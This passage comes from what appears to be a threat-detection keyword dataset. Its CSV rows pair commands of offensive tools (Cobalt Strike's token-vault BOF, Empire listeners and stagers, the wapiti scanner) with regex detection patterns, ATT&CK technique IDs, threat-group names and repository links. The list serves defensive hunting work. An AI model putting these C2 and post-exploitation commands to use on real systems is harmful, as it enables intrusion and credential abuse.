- T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "token-vault set *","token\-vault\sset\s.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "token-vault show*","token\-vault\sshow.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "token-vault use*","token\-vault\suse.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "uselistener http*","^uselistener\shttp.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","10","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "usestager *","^usestager\s.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","10","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "wapiti -*","wapiti\s\-.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","6","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z"